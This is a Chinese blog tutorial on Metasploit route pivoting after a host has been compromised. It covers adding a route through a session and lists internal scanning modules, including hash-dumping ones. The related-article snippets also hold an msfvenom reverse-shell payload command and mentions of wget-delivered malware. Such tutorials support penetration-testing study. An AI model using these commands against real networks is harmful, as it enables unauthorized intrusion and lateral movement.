MSF路由转发

最新推荐文章于 2024-07-05 14:04:08 发布
最新推荐文章于 2024-07-05 14:04:08 发布
阅读量959 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_38844729/article/details/110327630
版权

前言

已经拿下一台内网服务器的控制权,想要用msf去访问内网资源,可以在msf中添加路由
msf访问内网实现的条件:
1.获得一个msf的session会话
2.在msf中添加内网网段的路由

步骤

1.msf反弹shell,获取session会话,具体过程可以参考这里,我已经获得session,会话ID为3
在这里插入图片描述
2.添加路由
直接添加全网段的路由,这样只要被控机器可达的地址就都可访问

route add 0.0.0.0 0.0.0.0 session ID  #分别为网段,子网掩码和会话ID
run print

在这里插入图片描述
3.内网探测
添加路由之后,就可以使用msf的各种模块对内网进行探测

auxiliary/scanner/discovery/udp_sweep    	 #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    	 #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         	 #基于netbios协议发现内网存活主机
auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口

参考文章

https://www.cnblogs.com/wjw-zm/p/11689308.html

Franchi小白帽
关注
后渗透阶段之基于MSF路由转发
谢公子的博客
06-17 5850
目录 反弹MSF类型的Shell 添加内网路由 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直接访问的内网资源,只要路由可达了那么我们就可以使用MSF来进行探测了。 我们现在有下面这个环境: Web服务器通过端口映射,对外提供Web服务。Web服...
论后渗透MSF之 | 添加路由和代理
一醉一休的博客
09-08 6840
内网中添加路由主要是`充当跳板`功能, 其实是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的meterpreter shell的基础上`添加一条去往内网的路由`,此路由的下一跳转发,即网关,是MSF攻击平台与被攻击目标建立的一个session会话
msf路由
qq_41741127的博客
10-05 3700
metasploit设置路由转发 0. 试验环境 环境部署在VMWare下,共三台主机,两个网段。 Host-only(192.168.2.0):Kali(攻击机:192.168.2.129)Win7(靶机:192.168.2.128) NAT(192.168.32.0):Win7(靶机:192.168.32.151)OWASP Linux(靶机:192.168.32.150) 即:一台单网卡Kali,一台双网卡Win7,一台单网卡Linux,Win7与其余两台主机可以通信,其余两台主机之间不能互相通信。H
CFS三层内网渗透——进入二层内网并socks转发流量(二)
最新发布
weixin_74171325的博客
07-05 916
生成一个elf病毒,然后通过蚁剑进行wget远程传输,前面文章有提到各种文件传输方式Linux文件传输-CSDN博客文章浏览阅读271次。由于curl是访问,不带命令参数的话就是简单的访问远程目标文件,不会进行下载。这里我拿kali来演示,先创建个要传输的文件,然后python开启监听。
后渗透msf路由转发
whoim_i的博客
02-29 3040
目录前言拿到反弹shell添加内网路由 前言 在渗透的过程中常常会遇到这种场景:我们已经通过web渗透拿下一台内网服务器,为了进一步进行内网渗透,我们会利用“沦陷主机”作为跳板进行进一步的内网渗透,扩大战果。 MSF的跳板功能是MSF框架中自带的一个路由转发功能,其实现过程就是MSF框架在已经获取的Meterpreter Shell的基础上添加一条去往“内网”的路由,直接使用MSF去访问原本不能直...
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 903
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2037
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MSF:渗透之旅
prettyX的博客
12-30 487
渗透基础 1、show命令 Metasploit框架中包含数百个模块,没有人能用脑子把他们的名字全部记下来。在MSF终端中,运行show命令会把所有模块显示出来。 show exploits //会显示MSF中所有可用的渗透攻击模块 show auxiliary //会显示所有的辅助模块以及它们的用途 show options //保证MSF框架中各个模块正确运行所需的各种设置...
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
qq_46258964的博客
07-01 2537
MSF后渗透的一些操作 端口转发 添加路由,横向渗透(跨网段攻击) 利用arp扫描内网主机 Socks代理篇 新版的msf和老版的不一样,代理模块也不一样。 auxiliary/server/socks_proxy 配置proxychains 用代理软件去连接建立好的socks隧道,便可以成功访问内网。 proxychains+nmap扫描主机是否存在漏洞 proxychains使用msf框架...
MSF配置代理转发
j13373960206的博客
07-13 816
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf和主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
msf 代理和转发
03-11 5446
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理 反
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 958
免责声明:本文仅做技术交流与学习...
内网渗透-红队内网渗透工具(Viper)
lza20001103的博客
05-22 8716
红队内网渗透工具(Viper)
[内网渗透]msfconsole提权
purvispanwu的博客
03-17 1324
1.环境准备 kali虚拟机 IP:192.168.112.66 靶机 win7 SP1 IP:192.168.112.145 2.生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66
内网渗透-msf及socks代理转发
baynk的博客
05-29 9431
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
四维创智
09-19 6572
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
2019输入序列号闪退_CVE-2019-0708 BlueKeep远程桌面代码执行漏洞复现
weixin_39564617的博客
11-19 123
1、前言CVE-2019-0708 远程桌面代码执行漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过入RDP协议(3389端口)进行连接发送恶意代码到电脑中去。这个漏洞最早在5月份被曝光了,9月初就有POC代码公布了,一直没有时间实践一下。2、漏洞影响的系统Windows 7Windows Server 2008 R2Windows Server 2008Windows S...
CVE-2019-0708 RDP MSF漏洞利用
weixin_30343157的博客
09-07 2353
CVE-2019-0708 RDP MSF漏洞复现 漏洞环境 使用 VMware 安装Windows7 X64 模拟受害机 Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx EXP kali msf 攻击准备: 1,metasploit-framework,...
内网渗透 Metasploit(MSF)基础使用
Innocence_0的博客
03-09 1029
msfvenom 是 msf 生成 payload 的一个工具这里要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 里面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
内网MSF基础:PostgreSQL配置与权限管理教程
本篇文章主要介绍了在内网环境中使用Metasploit Framework (MSF)进行基础操作和配置的过程。MSF是一个广泛应用于渗透测试和网络安全的开源工具集,本文首先着重于如何在内网环境中设置和管理PostgreSQL数据库,因为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值